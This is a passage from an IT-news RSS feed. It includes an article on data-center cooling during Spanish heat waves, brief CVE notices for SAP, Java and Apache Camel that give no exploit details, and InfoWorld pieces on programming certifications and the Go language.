<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/11/ismail-enes-ayhan-lVZjvw-u9V8-unsplash.jpg?quality=50&amp;strip=all&amp;w=1024" alt="centro de datos" class="wp-image-4094600" width="1024" height="589" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">İsmail Enes Ayhan | Unsplash</p></div>



<p class="wp-block-paragraph">It was already getting hot in southern Europe, and preparations were needed. Now, temperatures are becoming a topic of conversation outside the region, and climate change has made its way into IT strategy. Benito confirms that, yes, the conversation is more visible in global settings. “For several reasons. The first is because, obviously, it affects operations. Another is the market. Customers also demand that you address this.” Before, the focus was on power capacity and square meters. Now, the expert points out, people are asking where the electricity comes from and whether it’s clean, and they’re demanding emissions guarantees. The sector is making significant investments to become sustainable, he argues.</p>



<p class="wp-block-paragraph">Beyond consumption data and the improvements that can be made, the big question is whether these high temperatures are already impacting decision-making—whether decisions on where to locate data centers (or not) are already being made with heat in mind.</p>



<p class="wp-block-paragraph">Industry representatives explain that while the climate can have an impact and is already taken into account when deciding where to locate a data center, it is not yet the sole factor or the most decisive one. In other words, many other factors must be considered, and these carry much more weight in the decision-making process. One such factor is energy, which is essential for these infrastructures and must be constant, resilient, and have a low carbon footprint. It is also an area where cooling plays a major role. As Román points out, cooling can account for between 30 and 40% of energy consumption, “and in poorly managed facilities, that figure approaches 50%.” Energy efficiency and cooling efficiency are thus essential—and not just for sustainability reasons. “It’s a matter of the bottom line.”</p>



<p class="wp-block-paragraph">Another factor is space. As Benito says, you need “stable locations where you can grow.” This isn’t just about whether the infrastructure <em>fits</em>, but also about how it aligns with the needs of its customers. As this expert points out, the concentration of data centers near Madrid or Barcelona isn’t “just a whim,” but because you need to be close to large population centers to provide them with low latency. “Other supercomputing applications can be located farther away, and that’s already happening,” he explains, but generally speaking, you can’t just put data centers anywhere. You have to strike a balance between needs and available space.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"></blockquote>



<h2 class="wp-block-heading">How to survive the heat</h2>



<p class="wp-block-paragraph">So, how can we survive the heat, especially when projections suggest that the future will bring even higher temperatures? The key is to understand that this is no longer a curiosity or an occasional incident. As Román points out, air-conditioning systems are running longer and longer. What worked 10 years ago will now barely suffice—it’s “pushed to its limits.” “Heat is shifting from being an August blip to a variable that must be monitored year-round. One you endure; the other you manage.”</p>



<p class="wp-block-paragraph">“By the time the room’s thermometer rises, it’s already too late. What you need to monitor isn’t the room—it’s the equipment—and you have to do it sooner,” he says. Román recommends a three-step strategy. First, don’t measure the environment; instead, measure the equipment and its variations in temperature, vibrations, and energy consumption. Next, take action on any deviations: Don’t wait for a failure, but instead act on early indicators that things aren’t normal. And finally, keep a comprehensive record of historical data, which will be key to anticipating issues and learning from them. “And here I’m going to be honest, because this is what I see every day: The technology to do all this already exists and isn’t expensive,” he asserts. “Many critical facilities are still managed using an Excel spreadsheet and the memory of a technician who’s been there for twenty years,” he warns. And that’s a problem.</p>



<p class="wp-block-paragraph">In the specific case of data centers, Spain has done its homework. The high temperatures (which exceeded those recorded in the United Kingdom, where some data centers did shut down) did not bring them to a halt during this heat wave.</p>



<p class="wp-block-paragraph">Unlike what might happen in other countries, Spain has optimized its cooling systems to be efficient and sustainable, as Benito explains, noting that the country must also contend with water stress. “In other countries, I can use water and let it evaporate as I please because I know it’s going to rain again—or at least that was the case until recently. In Spain, we’ve known for a long time that this isn’t the case,” he says. That’s why we work with closed-loop systems. “Most of us operators don’t use any water,” he says. The same water, mixed with certain cooling agents, circulates continuously. “Once the loop is filled, we don’t lose a single drop,” he asserts.</p>



<p class="wp-block-paragraph">What this expert is now seeing at international conferences is that in other countries where water wasn’t an apparent problem, people are starting to talk about working this way—”as a technical innovation.” “That’s where we say, ‘Yes, just like the ones we have in Spain or Portugal,’” he remarks with a touch of humor. “Water, like energy, is a challenge,” he says, so everything has already been designed with that in mind. It isn’t wasted, it doesn’t evaporate, and it isn’t consumed, he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44752 | SAP NetWeaver Application Server Java LMCTC 7.50 URL injection (EUVD-2026-43587)]]></title>
<description><![CDATA[A vulnerability was found in SAP NetWeaver Application Server Java LMCTC 7.50. It has been rated as critical. This issue affects some unknown processing of the component URL Handler. This manipulation of the argument URL causes injection.

This vulnerability is tracked as CVE-2026-44752. The atta...]]></description>
<link>https://tsecurity.de/de/3668302/sicherheitsluecken/cve-2026-44752-sap-netweaver-application-server-java-lmctc-750-url-injection-euvd-2026-43587/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668302/sicherheitsluecken/cve-2026-44752-sap-netweaver-application-server-java-lmctc-750-url-injection-euvd-2026-43587/</guid>
<pubDate>Tue, 14 Jul 2026 16:25:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/sap:netweaver_application_server_java">SAP NetWeaver Application Server Java LMCTC 7.50</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects some unknown processing of the component <em>URL Handler</em>. This manipulation of the argument <em>URL</em> causes injection.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-44752">CVE-2026-44752</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2016-9841 | Oracle Java SE 6u161/7u151/8u144 zlib numeric error (Nessus ID 103189 / ID 371397)]]></title>
<description><![CDATA[A vulnerability was found in Oracle Java SE 6u161/7u151/8u144. It has been classified as problematic. This vulnerability affects unknown code of the component zlib. The manipulation leads to numeric error.

This vulnerability is referenced as CVE-2016-9841. Remote exploitation of the attack is po...]]></description>
<link>https://tsecurity.de/de/3668080/sicherheitsluecken/cve-2016-9841-oracle-java-se-6u1617u1518u144-zlib-numeric-error-nessus-id-103189-id-371397/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668080/sicherheitsluecken/cve-2016-9841-oracle-java-se-6u1617u1518u144-zlib-numeric-error-nessus-id-103189-id-371397/</guid>
<pubDate>Tue, 14 Jul 2026 15:25:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 6u161/7u151/8u144</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This vulnerability affects unknown code of the component <em>zlib</em>. The manipulation leads to numeric error.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2016-9841">CVE-2016-9841</a>. Remote exploitation of the attack is possible. No exploit is available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Convert Minecraft Bedrock Seeds to Java Edition]]></title>
<description><![CDATA[Minecraft is available on all popular platforms/devices, from desktop computers to mobile phones. Some platforms even have more than one edition of the game. Two of the most widely played are Minecraft Bedrock Edition and Minecraft Java Edition — and knowing how to use bedrock seeds to java world...]]></description>
<link>https://tsecurity.de/de/3666687/betriebssysteme/how-to-convert-minecraft-bedrock-seeds-to-java-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666687/betriebssysteme/how-to-convert-minecraft-bedrock-seeds-to-java-edition/</guid>
<pubDate>Tue, 14 Jul 2026 03:39:13 +0200</pubDate>
<category>🖥️  Betriebssysteme</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Minecraft is available on all popular platforms/devices, from desktop computers to mobile phones. Some platforms even have more than one edition of the game. Two of the most widely played are Minecraft Bedrock Edition and Minecraft Java Edition — and knowing how to use bedrock seeds to java worlds, and vice versa, matters a great […]</p>
<p>The post <a rel="nofollow" href="https://www.addictivetips.com/gaming/minecraft-bedrock-seeds-to-java/">How to Convert Minecraft Bedrock Seeds to Java Edition</a> appeared first on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Jarfix]]></title>
<description><![CDATA[Ermittelt die installierte Java-Version unter Windows und stellt die richtige Verbindung zwischen dem Dateityp JAR (Java Archiv) und javaw.exe wieder her, damit Java-Programme mit einem Doppelklick gestartet werden können]]></description>
<link>https://tsecurity.de/de/3666625/downloads/jarfix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666625/downloads/jarfix/</guid>
<pubDate>Tue, 14 Jul 2026 02:17:03 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ermittelt die installierte Java-Version unter Windows und stellt die richtige Verbindung zwischen dem Dateityp JAR (Java Archiv) und javaw.exe wieder her, damit Java-Programme mit einem Doppelklick gestartet werden können]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-46590 | Apache Camel up to 4.18.2/4.20.x Camel-PQC java.io deserialization (WID-SEC-2026-2203)]]></title>
<description><![CDATA[A vulnerability has been found in Apache Camel up to 4.18.2/4.20.x and classified as critical. This impacts an unknown function of the file java.io of the component Camel-PQC. Performing a manipulation results in deserialization.

This vulnerability is reported as CVE-2026-46590. The attack is po...]]></description>
<link>https://tsecurity.de/de/3665873/sicherheitsluecken/cve-2026-46590-apache-camel-up-to-4182420x-camel-pqc-javaio-deserialization-wid-sec-2026-2203/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665873/sicherheitsluecken/cve-2026-46590-apache-camel-up-to-4182420x-camel-pqc-javaio-deserialization-wid-sec-2026-2203/</guid>
<pubDate>Mon, 13 Jul 2026 18:24:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/apache:camel">Apache Camel up to 4.18.2/4.20.x</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This impacts an unknown function of the file <em>java.io</em> of the component <em>Camel-PQC</em>. Performing a manipulation results in deserialization.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-46590">CVE-2026-46590</a>. The attack is possible to be carried out remotely. No exploit exists.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[Konferenz für Software-Entwicklung und Künstliche Intelligenz der Informatik Aktuell]]></title>
<description><![CDATA[IT-Security · DevOps · Datenbanken · Java. ☰. Entwicklung · Betrieb · Management ... Sicherheit und nachhaltige IT-Strategien. KI statt Software ...]]></description>
<link>https://tsecurity.de/de/3665847/it-security-nachrichten/konferenz-fuer-software-entwicklung-und-kuenstliche-intelligenz-der-informatik-aktuell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665847/it-security-nachrichten/konferenz-fuer-software-entwicklung-und-kuenstliche-intelligenz-der-informatik-aktuell/</guid>
<pubDate>Mon, 13 Jul 2026 18:23:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>IT</b>-<b>Security</b> · DevOps · Datenbanken · Java. ☰. Entwicklung · Betrieb · Management ... Sicherheit und nachhaltige IT-Strategien. KI statt Software ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Do programming certifications still matter?]]></title>
<description><![CDATA[If you’re a software developer or architect, you might wonder if programming certifications are still worth the effort, especially in the era of rapid AI-driven evolution. The short answer is, it depends.



“Certifications are shifting from a checkbox to a compass. They’re less about proving you...]]></description>
<link>https://tsecurity.de/de/3665678/ai-nachrichten/do-programming-certifications-still-matter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665678/ai-nachrichten/do-programming-certifications-still-matter/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:44 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">If you’re a software developer or architect, you might wonder if programming certifications are still worth the effort, especially in the era of rapid <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html" data-type="link" data-id="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">AI-driven evolution</a>. The short answer is, it depends.</p>



<p class="wp-block-paragraph">“Certifications are shifting from a checkbox to a compass. They’re less about proving you memorized syntax and more about proving you can architect systems, instruct AI coding assistants, and solve problems end-to-end,” says Faizel Khan, lead AI engineer at <a href="https://landingpoint.com/">Landing Point</a>, an executive search and recruiting firm.</p>



<p class="wp-block-paragraph">“In the AI era, fewer students will get trained on the job, which means they have to train themselves,” Khan says. “Certifications—especially architectural ones like AWS, Kubernetes, Terraform—are still the clearest path to do that.”</p>



<h2 class="wp-block-heading">Pros and cons of programming certifications</h2>



<p class="wp-block-paragraph">It’s not all black and white when it comes to deciding whether to pursue programming certifications. The effort involves both pros and cons.</p>



<p class="wp-block-paragraph">“In terms of pros, certifications concretely demonstrate that you have a skillset at a documented level,” says Chris Riccio, vice president of engineering at <a href="https://uplevelteam.com/">Uplevel</a>, an engineering optimization system provider. “They also show that you’ve put in the time and effort to learn, study, and prepare.”</p>



<p class="wp-block-paragraph">Programming certifications are “a useful way to validate foundational skills and show that someone understands core concepts,” says Greg Fuller, vice president of Skillsoft’s training provider, <a href="https://www.codecademy.com/">Codecademy</a>. “They’re especially helpful for people entering the field or shifting from adjacent roles.”</p>



<p class="wp-block-paragraph">Certifications offer a structured path to demonstrate proficiency, and they can confirm your ability to build and deploy in various environments, Fuller says.</p>



<p class="wp-block-paragraph">These types of certifications often demonstrate baseline proficiency and continuous learning, says Reshmi Ramachandran, head of partnerships and GTM strategy for <a href="https://www.cprime.com/">Cprime</a>, a consultancy. “These are often key indications of proficiency for companies looking to filter large candidate pools,” she says.</p>



<p class="wp-block-paragraph">Certifications really do two things, Khan adds. “First, they force you to learn by doing,” he says. “If you’re taking AWS Solutions Architect or Terraform, you don’t pass by guessing—you plan, build, and test systems. That practice matters. Second, they act as a public signal. Think of it like a micro-degree. You’re not just saying, ‘I know cloud.’ You’re showing you’ve crossed a bar that thousands of other engineers recognize.”</p>



<p class="wp-block-paragraph">But there are cons, too. “In tech, employers don’t just want credentials, they want proof you can deliver,” says Kevin Miller, CTO at <a href="https://www.ifs.com/industries/manufacturing/industrial-manufacturing">IFS</a>, a maker of factory automation software. “Programming certifications can be a valuable indicator of your baseline knowledge and competencies, especially if you’re early in your career or pivoting into tech, but their importance is dwindling.”</p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/generative-ai/">AI tools</a> that can generate, debug, and optimize code are <a href="https://www.infoworld.com/article/4077352/85-of-developers-use-ai-regularly-jetbrains-survey.html" data-type="link" data-id="https://www.infoworld.com/article/4077352/85-of-developers-use-ai-regularly-jetbrains-survey.html">already performing tasks once done by entry-level developers</a>, “which means fewer traditional programming roles are available,” Miller says. “As a result, the job market is becoming more competitive, and certifications aren’t seen as the noteworthy achievement they once were.”</p>



<p class="wp-block-paragraph">What’s more, not all certifications carry the same weight, Riccio says. “Some may reflect only familiarity rather than true expertise,” he says. “Certifications also often measure ‘book knowledge’ rather than practical experience, and they don’t always map clearly to the requirements of a specific role.”</p>



<p class="wp-block-paragraph">Programming certifications “can be a helpful signal, especially for confirming baseline knowledge in areas like cloud, security, or devops, but they’re not the full picture,” says Morgan Watts, vice president of IT at <a href="https://developer.8x8.com/">8×8</a>, a contact center platform developer.</p>



<p class="wp-block-paragraph">“I’m more interested in a candidate’s attitude and aptitude: what problems they’ve solved, what they’ve built, and how they’ve approached challenges,” Watts says. “Certifications can show commitment and discipline, and they’re especially useful in highly specialized roles. But I’m cautious when someone presents a laundry list of certifications with little evidence of real-world application.”</p>



<p class="wp-block-paragraph">A certification without experience doesn’t carry much weight, Watts says, and over-certification can sometimes signal the wrong focus. “Ultimately, it’s the ability to apply knowledge, collaborate, and adapt that sets great developers apart,” he says.</p>



<p class="wp-block-paragraph">Finally, certifications can age fast, Khan says. “Tech stacks evolve and a badge from two years ago may already feel dusty,” he says. “And some certifications are paper-thin—multiple-choice exams that don’t prove you can debug production at 2 a.m. So, the risk is you collect badges but still can’t ship.”</p>



<h2 class="wp-block-heading">Which certifications will get you noticed?</h2>



<p class="wp-block-paragraph">Despite the drawbacks, certifications are still very much in demand, and some carry more weight than others.</p>



<p class="wp-block-paragraph">The most in-demand certifications are typically platform-based—Amazon Web Services (AWS), Google Cloud Platform (GCP), Microsoft Azure, and others, Riccio says. “Many of these platforms provide managed services that integrate with existing systems or serve as the glue between them,” he says. “Today’s engineering teams aren’t just building standalone systems in isolation; they’re using other systems to store data, orchestrate business workflows, and connect applications.”</p>



<p class="wp-block-paragraph">A certification that demonstrates the ability to build solutions on these platforms can put a development professional ahead of the competition, Riccio says.</p>



<p class="wp-block-paragraph">“The certifications I see in highest demand tend to reflect the evolving tech landscape,” Watts says. “Cloud certifications from AWS, Azure, and GCP are incredibly valuable, especially as distributed systems become the norm.”</p>



<p class="wp-block-paragraph">Also in demand are certifications for <a href="https://www.infoworld.com/article/3632270/the-devops-certifications-tech-companies-want.html">devops and CI/CD tools</a> including <a href="https://www.infoworld.com/article/3529526/how-to-succeed-with-kubernetes.html">Kubernetes</a>, <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker</a>, and <a href="https://www.infoworld.com/article/2260091/what-is-jenkins-the-ci-server-explained.html">Jenkins</a>, Watts says, “because deployment automation and reliability are critical at scale. Also, with AI reshaping development, we’re seeing growing interest in certifications around machine learning, data science, and AI model integration. These certifications stand out because they align directly with the skills that teams need to move faster and more intelligently.”</p>



<aside class="sidebar large">
<h3>More about developer certifications</h3>
<p>Learn more about developer courses and certifications tech companies want:</p>
<ul>
<li><a href="https://www.infoworld.com/article/4055032/ai-developer-certifications-tech-companies-want.html">AI developer certifications</a></li>
<li><a href="https://www.infoworld.com/article/3583466/the-machine-learning-certifications-tech-companies-want.html">Machine learning certifications</a></li>
<li><a href="https://www.infoworld.com/article/2337635/4-cloud-certifications-that-will-help-you-stand-out.html">Cloud development certifications</a></li>
<li><a href="https://www.infoworld.com/article/3632270/the-devops-certifications-tech-companies-want.html">Devops and CI/CD certifications</a></li>
</ul>
</aside>




<p class="wp-block-paragraph">On the AI front, certifications in <a href="https://www.infoworld.com/article/2255099/what-is-tensorflow-the-machine-learning-library-explained.html">TensorFlow</a> and other <a href="https://www.infoworld.com/article/3583466/the-machine-learning-certifications-tech-companies-want.html">machine learning platforms</a> are gaining traction as organizations look to embed AI across the development process, Watts says. “These are the certifications that align closely with where modern engineering is headed—scalable, secure, and AI-enabled,” he says.</p>



<p class="wp-block-paragraph">And then there are <a href="https://www.csoonline.com/article/3970107/the-14-most-valuable-cybersecurity-certifications.html">cybersecurity credentials</a> that continue to be in high demand. Security certifications, such as CompTIA Security+ or Certified Ethical Hacker, “have become essential as every company faces increasing cyber threats and compliance requirements,” Miller says.</p>



<p class="wp-block-paragraph">“Core programming certifications are still a bit niche, but the adjacent skills, like those that help developers deploy, secure, and scale their code, are driving demand,” Fuller says. “Companies want developers who understand the full lifecycle, not just how to write code.”</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3980325/the-java-certifications-tech-companies-want.html">The best Java certifications for software developers</a>.</strong></p>



<h2 class="wp-block-heading">Certifications in the hiring process</h2>



<p class="wp-block-paragraph">Experts are clear that programming certifications alone will not get you the job. But they do play a role in the hiring process.</p>



<p class="wp-block-paragraph">“The information technology world is characterized by rapid and continuous evolution, including the skills and knowledge required to work in the field,” says Diane Rafferty, managing director of the National Technology Group at <a href="https://www.atriumglobal.com/">Atrium</a>, a global talent solutions and extended workforce management firm.</p>



<p class="wp-block-paragraph">“Certifications not only prove that you have the skills and knowledge needed, but they also show employers that you’re invested in your education and career growth,” Rafferty says. “They can give you a competitive edge when looking for a job, as many companies now require candidates to have them.”</p>



<p class="wp-block-paragraph">Certifications are one part of the hiring equation, “but never the only part,” Watts says. “They help validate that a candidate has taken the time to build foundational knowledge, and that’s a good sign. But I put more weight on how a person thinks, solves problems, and contributes to the team. I look for people who are curious and proactive, who are learning because they want to, not just because a course told them to.”</p>



<p class="wp-block-paragraph">Certifications can also play a valuable role in retention, Watts says. “I encourage team members to pursue growth, and when they invest in their own development, the whole organization benefits,” he says. “But again, it’s that balance of knowledge, attitude, and applied experience that really moves the needle.”</p>



<p class="wp-block-paragraph">Certifications “may allow you to breeze through the initial résumé screening process, potentially getting you to the next stage faster,” Riccio says. “At a minimum, they will set your profile apart from the rest of the pack. They also demonstrate that you’ve reached a baseline level of expertise, allowing hiring managers to quickly evaluate whether you have the skills for the role.”</p>



<p class="wp-block-paragraph">Employers today “care far less about whether someone has passed an exam and far more about whether they can apply knowledge effectively in real-world situations, leverage AI tools, and solve complex problems,” Miller says. “A certification might get someone an interview, but being able to demonstrate problem-solving skills, teamwork, and adaptability will really make them stand out.”</p>



<h2 class="wp-block-heading">Popular programming certifications</h2>



<p class="wp-block-paragraph">The following certifications consistently rose to the top in my conversations with tech leaders and hiring managers.</p>



<h3 class="wp-block-heading">AWS Certified Developer—Associate</h3>



<p class="wp-block-paragraph">Showcases skills and knowledge in developing, optimizing, packaging, and deploying applications, using CI/CD workflows, and identifying and resolving application issues, according to AWS. This certification is said to be a good starting point on the AWS certification journey for professionals in IT or cloud developer job roles.</p>



<h3 class="wp-block-heading">Azure Developer Associate</h3>



<p class="wp-block-paragraph">This certificate from Microsoft is intended for developers participating in all phases of cloud development, including design, deployment, maintenance, and monitoring. The course teaches developers how to create end-to-end solutions in Microsoft Azure, using the Microsoft Learn Sandbox environment to access Azure resources and services.</p>



<h3 class="wp-block-heading">Certified Kubernetes Application Developer (CKAD)</h3>



<p class="wp-block-paragraph">This certification was created by the Linux Foundation and Cloud Native Computing Foundation. It demonstrates that candidates can design, build, and deploy cloud-native applications for Kubernetes.</p>



<h3 class="wp-block-heading">Certified Secure Software Lifecycle Professional (CSSLP)</h3>



<p class="wp-block-paragraph">This certification, from ISC2, focuses on secure software development practices. It recognizes leading application security skills and demonstrates advanced technical skills and knowledge needed for authentication, authorization, and auditing throughout the software development lifecycle.</p>



<h3 class="wp-block-heading">Databricks Certified Machine Learning Professional</h3>



<p class="wp-block-paragraph">Professionals learn about the latest data and AI techniques and how they can use the Databricks Data Intelligence Platform to build a variety of solutions across data engineering, data warehousing, data science, and AI.</p>



<h3 class="wp-block-heading">Professional Cloud Architect</h3>



<p class="wp-block-paragraph">This certification from Google assesses the ability to design and plan a cloud solution architecture, manage and provision the cloud solution infrastructure, design for security and compliance, analyze and optimize technical and business processes manage implementations of cloud architecture, and ensure solution and operations reliability.</p>



<h3 class="wp-block-heading">Terraform Associate</h3>



<p class="wp-block-paragraph">This certification from HashiCorp is for cloud engineers specializing in operations, IT, or development who know the basic concepts and skills associated with Terraform. It validates foundational skills in using <a href="https://www.infoworld.com/article/3893387/how-terraform-is-evolving-infrastructure-as-code.html">Terraform</a> for <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure as code</a> development.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s the Go language really good for?]]></title>
<description><![CDATA[Over its more than 15 years in the wild, Google’s Go programming language has evolved from a curiosity for alpha geeks to the battle-tested programming language behind some of the world’s most important cloud-native software projects.



If you’ve ever wondered why Go is the language of choice fo...]]></description>
<link>https://tsecurity.de/de/3665677/ai-nachrichten/whats-the-go-language-really-good-for/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665677/ai-nachrichten/whats-the-go-language-really-good-for/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:43 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over its more than 15 years in the wild, Google’s <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">Go programming language</a> has evolved from a curiosity for alpha geeks to the battle-tested programming language behind some of the world’s most important <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html">cloud-native</a> software projects.</p>



<p class="wp-block-paragraph">If you’ve ever wondered why Go is the language of choice for projects like <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a> and <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a>, this article is for you. We’ll discuss Go’s defining characteristics and how it differs from other programming languages. You will also learn what kinds of projects Go is best suited for, including the state of <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">Go development for AI-powered tools</a>. We’ll conclude with an overview of Go’s feature set, some limitations of the language, and where it may be going from here.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">Golang tutorial: Get started with the Go language</a>.</strong></p>



<h2 class="wp-block-heading">Go is small and simple</h2>



<p class="wp-block-paragraph">Go, or <a href="https://go.dev/doc/faq#go_or_golang">Golang</a> as it’s often called, was created by Google employees—chiefly longtime Unix guru and Google distinguished engineer Rob Pike—but it’s not strictly speaking a “Google project.” Rather, Go is a community-developed <a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">open source</a> project, spearheaded by leadership with strong opinions about how Go should be used and the direction the language should take.</p>



<p class="wp-block-paragraph">Go is meant to be easy to learn and straightforward to use, with syntax that is simple to read and understand. Go does not have a large feature set, especially when compared to languages like <a href="https://www.infoworld.com/article/2338049/c-23-language-standard-declared-feature-complete.html">C++</a>. Go’s syntax is reminiscent of <a href="https://www.infoworld.com/article/2261151/why-the-c-programming-language-still-rules.html">C</a>, making it relatively easy for longtime C developers to learn. That said, many features of Go, especially its <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">concurrency and functional programming features</a>, harken back to languages like Erlang.</p>



<p class="wp-block-paragraph">As a C-like language for building and maintaining cross-platform enterprise applications of all sorts, <a href="https://www.infoworld.com/article/2514123/8-reasons-developers-love-go-and-8-reasons-they-dont.html">Go has much in common with Java</a>. And as a means for enabling rapid development of code that might run anywhere, you could draw a parallel between Go and <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">Python</a>, though the differences outweigh the similarities.</p>



<p class="wp-block-paragraph">The <a href="https://go.dev/doc">Go documentation</a> describes Go as “a fast, statically typed, compiled language that feels like a dynamically typed, interpreted language.” Even a large Go program will compile in a matter of seconds. Plus, Go avoids much of the overhead of C-style include files and libraries.</p>



<h2 class="wp-block-heading">Advantages of the Go language</h2>



<p class="wp-block-paragraph">Go is a versatile, convenient, fast, portable, interoperable, and widely supported modern language. These characteristics have helped to make it a top choice for large-scale development projects. Let’s look more closely at each of these positive qualities of Go.</p>



<h3 class="wp-block-heading">Go is versatile and convenient</h3>



<p class="wp-block-paragraph">Go has been compared to interpreted languages like <a href="https://www.infoworld.com/article/2254260/how-to-get-started-with-python.html">Python</a> in its ability to satisfy many common programming needs. Some of this functionality is built into the language itself, such as goroutines for concurrency and thread-like behavior, while additional capabilities are available in Go standard library packages, like the <a href="https://golang.org/pkg/net/http/">http package</a>. Like Python, Go provides automatic memory management capabilities including <a href="https://www.infoworld.com/article/2337816/what-is-garbage-collection-automated-memory-management-for-your-programs.html">garbage collection</a>.</p>



<p class="wp-block-paragraph">Unlike interpreted languages, however, Go code compiles to a fast-running native binary. And unlike C or C++, Go compiles extremely fast—fast enough to make working with Go feel more like working with an interpreted language than a compiled one. Further, the Go build system is less complex than those of other compiled languages. It takes few steps and little bookkeeping to build and run a Go project.</p>



<h3 class="wp-block-heading">Go is faster than many other languages</h3>



<p class="wp-block-paragraph">Go binaries run more slowly than their C counterparts, but the difference in speed is negligible for most applications. Go performance is as good as C for the vast majority of work, and generally much faster than other languages known for speed of development—including <a href="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html">JavaScript</a>, <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">Python</a>, and <a href="https://www.infoworld.com/article/2337962/whatever-happened-to-ruby.html">Ruby</a>.</p>



<h3 class="wp-block-heading">Go is portable and interoperable</h3>



<p class="wp-block-paragraph">Executables created with the Go toolchain can stand alone, with no default external dependencies. The Go toolchain is available for a wide variety of operating systems and hardware platforms, and can be used to compile binaries across platforms. What’s more, Go delivers all of the above without sacrificing access to the underlying system. Go programs can talk to external C libraries or make native system calls. In <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker</a>, for instance, Go interacts with low-level Linux functions, cgroups, and namespaces to work container magic.</p>



<h3 class="wp-block-heading">Go is widely supported</h3>



<p class="wp-block-paragraph">The Go toolchain is freely available as a Linux, macOS, or Windows binary, or as a Docker container. Go is included by default in many popular Linux distributions, such as Red Hat Enterprise Linux and Fedora, making it somewhat easier to deploy Go source to those platforms. Support for Go is also strong across many third-party development environments, from Microsoft’s <a href="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html">Visual Studio Code</a> to ActiveState’s <a href="https://www.infoworld.com/article/2250631/review-7-python-ides-compared.html">Komodo IDE</a>.</p>



